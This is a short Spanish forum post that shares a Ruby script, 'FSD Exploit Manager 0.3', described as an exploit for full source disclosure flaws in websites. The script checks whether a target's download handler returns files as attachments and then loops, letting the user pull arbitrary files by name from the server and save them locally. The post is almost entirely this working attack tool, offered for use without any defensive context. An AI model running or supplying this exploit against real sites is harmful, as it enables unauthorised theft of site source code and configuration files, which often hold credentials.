Un simple script en Ruby que sirve como exploit para la vulnerabilidad Full Source Discloure.

El codigo :
#!usr/bin/ruby
#FSD Exploit Manager 0.3

require "open-uri"
require "net/http"  

# Functions 

def toma(web)
	begin
		return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
	rescue
		return "Error"
	end
end

def uso 
	print "\n[+] Sintax : ruby locateip.rb <target>\n"
end

def  head
	print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n"
end

def copyright
	print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
	exit(1)
end

def installer
	if not Dir.exists?("logs")
		Dir.mkdir "logs"
	end
	Dir.chdir("logs")
end

def download(file,name)
	File.open(name, "wb") do |saved_file|
		open(file, "rb") do |read_file|
			saved_file.write(read_file.read)
		end
	end
end

def scan_fsd(target)
	print "\n[+] Scanning ...\n\n"
	path = File.basename(URI(target).path)
	code = toma(target+path)
	if code=~/header\((.*)Content-Disposition: attachment;/
		print "[+] Vulnerable !\n"
		while(1)
			print "\n[+] Insert Filename : "
			filename = STDIN.gets.chomp
			if filename=="exit"
				copyright()
			else
				download(target+filename,filename)
				print "\n[+] Downloaded !\n"
			end
		end
		
	else
		print "[-] Not vulnerable\n"
	end
end

target = ARGV[0]

installer()

head()

if !target
	uso()
else
	scan_fsd(target)
end

copyright()

#The End ?
Eso es todo.
Responder

Volver a “Fuentes”